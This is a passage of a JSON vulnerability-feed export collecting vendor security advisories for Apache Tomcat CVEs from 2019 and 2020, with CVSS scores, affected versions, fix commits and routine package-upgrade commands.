{"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0199", "CVE-2019-0221"], "modified": "2019-06-30T00:00:00", "id": "OPENSUSE-SU-2019:1673-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/36H2KGFI64Y7Z3YTFXWV2YQODHAXC6AV/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-04-18T12:41:53", "description": "An update that solves two vulnerabilities and has one\n errata is now available.\n\nDescription:\n\n This update for tomcat to version 9.0.21 fixes the following issues:\n\n Security issues fixed:\n\n - CVE-2019-0199: Fixed a denial of service in the HTTP/2 implementation\n related to streams with excessive numbers of SETTINGS frames\n (bsc#1131055).\n - CVE-2019-0221: Fixed a cross site scripting vulnerability with the SSI\n printenv command (bsc#1136085).\n\n Non-security issues fixed:\n\n - Increase maximum number of threads and open files for tomcat\n (bsc#1111966).\n\n This update was imported from the SUSE:SLE-15-SP1:Update update project.\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.1:\n\n zypper in -t patch openSUSE-2019-1808=1", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-07-25T00:00:00", "type": "suse", "title": "Security update for tomcat (moderate)", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0199", "CVE-2019-0221"], "modified": "2019-07-25T00:00:00", "id": "OPENSUSE-SU-2019:1808-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/QG2SPH2GUSXWEVOOJMUB4WVQPKM3QPV6/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "tomcat": [{"lastseen": "2023-02-09T13:57:20", "description": "_Note: The issues below were fixed in Apache Tomcat 9.0.18 but the release vote for the 9.0.18 release candidate did not pass. Therefore, although users must download 9.0.19 to obtain a version that includes a fix for these issues, version 9.0.18 is not included in the list of affected versions._\n\n**Important: Remote Code Execution on Windows** [CVE-2019-0232](<https://vulners.com/cve/CVE-2019-0232>)\n\nWhen running on Windows with enableCmdLineArguments enabled, the CGI Servlet is vulnerable to Remote Code Execution due to a bug in the way the JRE passes command line arguments to Windows. The CGI Servlet is disabled by default. The CGI option enableCmdLineArguments is disabled by default in Tomcat 9.0.x. For a detailed explanation of the JRE behaviour, see [Markus Wulftange's blog](<https://codewhitesec.blogspot.com/2016/02/java-and-command-line-injections-in-windows.html>) and this archived [MSDN blog](<https://web.archive.org/web/20161228144344/https://blogs.msdn.microsoft.com/twistylittlepassagesallalike/2011/04/23/everyone-quotes-command-line-arguments-the-wrong-way/>).\n\nThis was fixed with commit [4b244d82](<https://github.com/apache/tomcat/commit/4b244d827ade2a36ef3b8734939541207b78f35c>).\n\nThis issue was identified by Nightwatch Cybersecurity Research and reported to the Apache Tomcat security team via the bug bounty program sponsored by the EU FOSSA-2 project on 3rd March 2019. The issue was made public on 10 April 2019.\n\nAffects: 9.0.0.M1 to 9.0.17\n\n**Low: XSS in SSI printenv** [CVE-2019-0221](<https://vulners.com/cve/CVE-2019-0221>)\n\nThe SSI printenv command echoes user provided data without escaping and is, therefore, vulnerable to XSS. SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website.\n\nThis was fixed with commit [15fcd166](<https://github.com/apache/tomcat/commit/15fcd166ea2c1bb79e8541b8e1a43da9c452ceea>).\n\nThis issue was identified by Nightwatch Cybersecurity Research and reported to the Apache Tomcat security team via the bug bounty program sponsored by the EU FOSSA-2 project on 7th March 2019. The issue was made public on 17 May 2019.\n\nAffects: 9.0.0.M1 to 9.0.17", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-04-13T00:00:00", "type": "tomcat", "title": "Fixed in Apache Tomcat 9.0.19", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0221", "CVE-2019-0232"], "modified": "2019-04-13T00:00:00", "id": "TOMCAT:5FF617CEB667027ABB70FDFB3A8FFD4C", "href": "https://tomcat.apache.org/security-9.html#Fixed_in_Apache_Tomcat_9.0.19", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-09T13:57:22", "description": "**Important: Remote Code Execution on Windows** [CVE-2019-0232](<https://vulners.com/cve/CVE-2019-0232>)\n\nWhen running on Windows with enableCmdLineArguments enabled, the CGI Servlet is vulnerable to Remote Code Execution due to a bug in the way the JRE passes command line arguments to Windows. The CGI Servlet is disabled by default. For a detailed explanation of the JRE behaviour, see [Markus Wulftange's blog](<https://codewhitesec.blogspot.com/2016/02/java-and-command-line-injections-in-windows.html>) and this archived [MSDN blog](<https://web.archive.org/web/20161228144344/https://blogs.msdn.microsoft.com/twistylittlepassagesallalike/2011/04/23/everyone-quotes-command-line-arguments-the-wrong-way/>).\n\nThis was fixed with commit [7f0221b9](<https://github.com/apache/tomcat/commit/7f0221b904956359f2d739aa3a2b53f8c12ed8c7>).\n\nThis issue was identified by Nightwatch Cybersecurity Research and reported to the Apache Tomcat security team via the bug bounty program sponsored by the EU FOSSA-2 project on 3rd March 2019. The issue was made public on 10 April 2019.\n\nAffects: 7.0.0 to 7.0.93\n\n**Low: XSS in SSI printenv** [CVE-2019-0221](<https://vulners.com/cve/CVE-2019-0221>)\n\nThe SSI printenv command echoes user provided data without escaping and is, therefore, vulnerable to XSS. SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website.\n\nThis was fixed with commit [44ec74c4](<https://github.com/apache/tomcat/commit/44ec74c44dcd05cd7e90967c04d40b51440ecd7e>).\n\nThis issue was identified by Nightwatch Cybersecurity Research and reported to the Apache Tomcat security team via the bug bounty program sponsored by the EU FOSSA-2 project on 7th March 2019. The issue was made public on 17 May 2019.\n\nAffects: 7.0.0 to 7.0.93", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-04-12T00:00:00", "type": "tomcat", "title": "Fixed in Apache Tomcat 7.0.94", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0221", "CVE-2019-0232"], "modified": "2019-04-12T00:00:00", "id": "TOMCAT:95E28D1C95DD85DE7ADBDED721C3DA07", "href": "https://tomcat.apache.org/security-7.html#Fixed_in_Apache_Tomcat_7.0.94", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-09T13:57:19", "description": "**Important: Remote Code Execution on Windows** [CVE-2019-0232](<https://vulners.com/cve/CVE-2019-0232>)\n\nWhen running on Windows with enableCmdLineArguments enabled, the CGI Servlet is vulnerable to Remote Code Execution due to a bug in the way the JRE passes command line arguments to Windows. The CGI Servlet is disabled by default. For a detailed explanation of the JRE behaviour, see [Markus Wulftange's blog](<https://codewhitesec.blogspot.com/2016/02/java-and-command-line-injections-in-windows.html>) and this archived [MSDN blog](<https://web.archive.org/web/20161228144344/https://blogs.msdn.microsoft.com/twistylittlepassagesallalike/2011/04/23/everyone-quotes-command-line-arguments-the-wrong-way/>).\n\nThis was fixed with commit [5bc4e6d7](<https://github.com/apache/tomcat/commit/5bc4e6d7b1c22dc1bf99f475b7e70594ebdd83b9>).\n\nThis issue was identified by Nightwatch Cybersecurity Research and reported to the Apache Tomcat security team via the bug bounty program sponsored by the EU FOSSA-2 project on 3rd March 2019. The issue was made public on 10 April 2019.\n\nAffects: 8.5.0 to 8.5.39\n\n**Low: XSS in SSI printenv** [CVE-2019-0221](<https://vulners.com/cve/CVE-2019-0221>)\n\nThe SSI printenv command echoes user provided data without escaping and is, therefore, vulnerable to XSS. SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website.\n\nThis was fixed with commit [4fcdf706](<https://github.com/apache/tomcat/commit/4fcdf706f3ecf35912a600242f89637f5acb32da>).\n\nThis issue was identified by Nightwatch Cybersecurity Research and reported to the Apache Tomcat security team via the bug bounty program sponsored by the EU FOSSA-2 project on 7th March 2019. The issue was made public on 17 May 2019.\n\nAffects: 8.5.0 to 8.5.39", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-04-12T00:00:00", "type": "tomcat", "title": "Fixed in Apache Tomcat 8.5.40", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0221", "CVE-2019-0232"], "modified": "2019-04-12T00:00:00", "id": "TOMCAT:E4520A0C2F785FBF22985309FA3E3B08", "href": "https://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_8.5.40", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2023-02-08T15:58:47", "description": "### *Detect date*:\n04/13/2019\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities was found in Apache Tomcat. Malicious users can exploit this vulnerability to execute arbitrary code and perform cross-site scripting attack.\n\n### *Affected products*:\nApache Tomcat 8.5.x earlier than 8.5.40 \nApache Tomcat 7.x earlier than 7.0.94 \nApache Tomcat 9.x earlier than 9.0.19\n\n### *Solution*:\nUpdate to the latest version \n[Download Tomcat 8](<https://tomcat.apache.org/download-80.cgi>) \n[Download Tomcat 9](<https://tomcat.apache.org/download-90.cgi>)\n\n### *Original advisories*:\n[Apache Tomcat 8.x Security Vulnerabilities](<http://tomcat.apache.org/security-8.html>) \n[Apache Tomcat 7.x Security Vulnerabilities](<http://tomcat.apache.org/security-7.html>) \n[Apache Tomcat 9.x Security Vulnerabilities](<http://tomcat.apache.org/security-9.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Apache Tomcat](<https://threats.kaspersky.com/en/product/Apache-Tomcat/>)\n\n### *CVE-IDS*:\n[CVE-2019-0232](<https://vulners.com/cve/CVE-2019-0232>)9.3Critical \n[CVE-2019-0221](<https://vulners.com/cve/CVE-2019-0221>)4.3Warning", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-04-13T00:00:00", "type": "kaspersky", "title": "KLA11472 ACE vulnerability in Apache Tomcat", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0221", "CVE-2019-0232"], "modified": "2020-06-03T00:00:00", "id": "KLA11472", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11472/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2023-01-26T15:44:31", "description": "## Releases\n\n * Ubuntu 19.04 \n * Ubuntu 18.04 LTS\n\n## Packages\n\n * tomcat9 \\- Servlet and JSP engine\n\nIt was discovered that the Tomcat 9 SSI printenv command echoed user \nprovided data without escaping it. An attacker could possibly use this \nissue to perform an XSS attack. (CVE-2019-0221)\n\nIt was discovered that Tomcat 9 did not address HTTP/2 connection window \nexhaustion on write while addressing CVE-2019-0199. An attacker could \npossibly use this issue to cause a denial of service. (CVE-2019-10072)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-09-18T00:00:00", "type": "ubuntu", "title": "Tomcat vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0199", "CVE-2019-0221", "CVE-2019-10072"], "modified": "2019-09-18T00:00:00", "id": "USN-4128-2", "href": "https://ubuntu.com/security/notices/USN-4128-2", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-26T15:44:46", "description": "## Releases\n\n * Ubuntu 18.04 LTS\n * Ubuntu 16.04 ESM\n\n## Packages\n\n * tomcat8 \\- Servlet and JSP engine\n\nIt was discovered that the Tomcat 8 SSI printenv command echoed user \nprovided data without escaping it. An attacker could possibly use this \nissue to perform an XSS attack. (CVE-2019-0221)\n\nIt was discovered that Tomcat 8 did not address HTTP/2 connection window \nexhaustion on write while addressing CVE-2019-0199. An attacker could \npossibly use this issue to cause a denial of service. (CVE-2019-10072)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-09-10T00:00:00", "type": "ubuntu", "title": "Tomcat vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0199", "CVE-2019-0221", "CVE-2019-10072"], "modified": "2019-09-10T00:00:00", "id": "USN-4128-1", "href": "https://ubuntu.com/security/notices/USN-4128-1", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "mageia": [{"lastseen": "2022-04-18T11:19:34", "description": "Updated tomcat packages fix security vulnerabilities: The HTTP/2 implementation accepted streams with excessive numbers of SETTINGS frames and also permitted clients to keep streams open without reading/writing request/response data. By keeping streams open for requests that utilised the Servlet API's blocking I/O, clients were able to cause server-side threads to block eventually leading to thread exhaustion and a DoS (CVE-2019-0199). The SSI printenv command echoes user provided data without escaping and is, therefore, vulnerable to XSS. SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website (CVE-2019-0221). The fix for CVE-2019-0199 was incomplete and did not address HTTP/2 connection window exhaustion on write. By not sending WINDOW_UPDATE messages for the connection window (stream 0) clients were able to cause server-side threads to block eventually leading to thread exhaustion and a DoS (CVE-2019-10072). The tomcat package has been updated to version 9.0.21 to fix these issues. The tomcat-native package has also been updated to version 1.2.23. \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-09-08T14:09:05", "type": "mageia", "title": "Updated tomcat packages fix security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0199", "CVE-2019-0221", "CVE-2019-10072"], "modified": "2019-09-08T14:09:05", "id": "MGASA-2019-0260", "href": "https://advisories.mageia.org/MGASA-2019-0260.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "gentoo": [{"lastseen": "2022-01-17T19:02:24", "description": "### Background\n\nApache Tomcat is a Servlet-3.0/JSP-2.2 Container.\n\n### Description\n\nMultiple vulnerabilities have been discovered in Apache Tomcat. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nAn attacker could possibly smuggle HTTP requests or execute arbitrary code. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Apache Tomcat 7.x users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-servers/tomcat-7.0.100:7\"\n \n\nAll Apache Tomcat 8.5.x users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-servers/tomcat-8.5.51:8.5\"", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-19T00:00:00", "type": "gentoo", "title": "Apache Tomcat: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0221", "CVE-2019-12418", "CVE-2019-17563", "CVE-2020-1938"], "modified": "2020-06-26T00:00:00", "id": "GLSA-202003-43", "href": "https://security.gentoo.org/glsa/202003-43", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2021-10-19T20:40:27", "description": "Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache HTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector (mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat Native library.\n\nThis release of Red Hat JBoss Web Server 3.1 Service Pack 8 serves as a replacement for Red Hat JBoss Web Server 3.1, and includes bug fixes, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* tomcat: session fixation (CVE-2019-17563)\n\n* tomcat: local privilege escalation (CVE-2019-12418)\n\n* tomcat: Apache Tomcat AJP File Read/Inclusion Vulnerability (CVE-2020-1938)\n\n* tomcat: XSS in SSI printenv (CVE-2019-0221)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-17T12:51:05", "type": "redhat", "title": "(RHSA-2020:0860) Important: Red Hat JBoss Web Server 3.1 Service Pack 8 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0221", "CVE-2019-12418", "CVE-2019-17563", "CVE-2020-1938"], "modified": "2020-03-17T13:03:07", "id": "RHSA-2020:0860", "href": "https://access.redhat.com/errata/RHSA-2020:0860", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-19T20:40:58", "description": "Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache HTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector (mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat Native library.\n\nThis release of Red Hat JBoss Web Server 3.1 Service Pack 8 serves as a replacement for Red Hat JBoss Web Server 3.1, and includes bug fixes, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* tomcat: session fixation (CVE-2019-17563)\n\n* tomcat: local privilege escalation (CVE-2019-12418)\n\n* tomcat: Apache Tomcat AJP File Read/Inclusion Vulnerability (CVE-2020-1938)\n\n* tomcat: XSS in SSI printenv (CVE-2019-0221)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-17T12:51:11", "type": "redhat", "title": "(RHSA-2020:0861) Important: Red Hat JBoss Web Server 3.1 Service Pack 8 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0221", "CVE-2019-12418", "CVE-2019-17563", "CVE-2020-1938"], "modified": "2020-03-17T13:03:31", "id": "RHSA-2020:0861", "href": "https://access.redhat.com/errata/RHSA-2020:0861", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-19T20:36:32", "description": "Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache Tomcat Servlet container, JBoss HTTP Connector (mod_cluster), the PicketLink Vault extension for Apache Tomcat, and the Tomcat Native library.\n \nRefer to the Release Notes for information on the most significant bug fixes, enhancements and component upgrades included in this release.\n\nSecurity Fix(es):\n\n* openssl: Side-channel vulnerability on SMT/Hyper-Threading architectures (PortSmash) (CVE-2018-5407) \n* tomcat: XSS in SSI printenv (CVE-2019-0221) \n* openssl: 0-byte record padding oracle (CVE-2019-1559) \n* tomcat: HTTP/2 implementation leads to denial of service (CVE-2019-10072)\n* tomcat: Apache Tomcat HTTP/2 DoS (CVE-2019-0199)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", 